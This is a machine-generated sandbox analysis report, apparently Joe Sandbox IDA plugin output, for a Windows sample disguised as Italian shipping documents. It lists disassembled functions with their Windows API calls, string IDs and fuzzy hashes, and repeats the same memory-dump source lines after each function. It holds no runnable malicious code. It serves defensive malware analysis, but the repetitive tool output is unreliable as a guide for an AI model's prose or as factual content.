                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert
                        • String ID: 0
                        • API String ID: 3076010158-4108050209
                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                        Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$_memmove_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 1589278365-1403004172
                        • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                        • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                        Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Handle
                        • String ID: nul
                        • API String ID: 2519475695-2873401336
                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                        Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Handle
                        • String ID: nul
                        • API String ID: 2519475695-2873401336
                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                        Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID: SysAnimate32
                        • API String ID: 0-1011021900
                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                        Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                        • GetFocus.USER32 ref: 0046157B
                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                        • __swprintf.LIBCMT ref: 00461608
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                        • String ID: %s%d
                        • API String ID: 2645982514-1110647743
                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                        Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                        Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        • String ID:
                        • API String ID: 3488606520-0
                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                        Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ConnectRegistry_memmove_wcslen
                        • String ID:
                        • API String ID: 15295421-0
                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                        Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressProc$Library$FreeLoad
                        • String ID:
                        • API String ID: 2449869053-0
                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                        Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 004563A6
                        • ScreenToClient.USER32(?,?), ref: 004563C3
                        • GetAsyncKeyState.USER32(?), ref: 00456400
                        • GetAsyncKeyState.USER32(?), ref: 00456410
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorLongScreenWindow
                        • String ID:
                        • API String ID: 3539004672-0
                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                        Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Interlocked$DecrementIncrement$Sleep
                        • String ID:
                        • API String ID: 327565842-0
                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                        Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                        Download Yara Rule
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        • String ID:
                        • API String ID: 2832842796-0
                        • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                        • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                        Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Enum$CloseDeleteOpen
                        • String ID:
                        • API String ID: 2095303065-0
                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                        Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00436A24
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: RectWindow
                        • String ID:
                        • API String ID: 861336768-0
                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                        Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32 ref: 00449598
                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
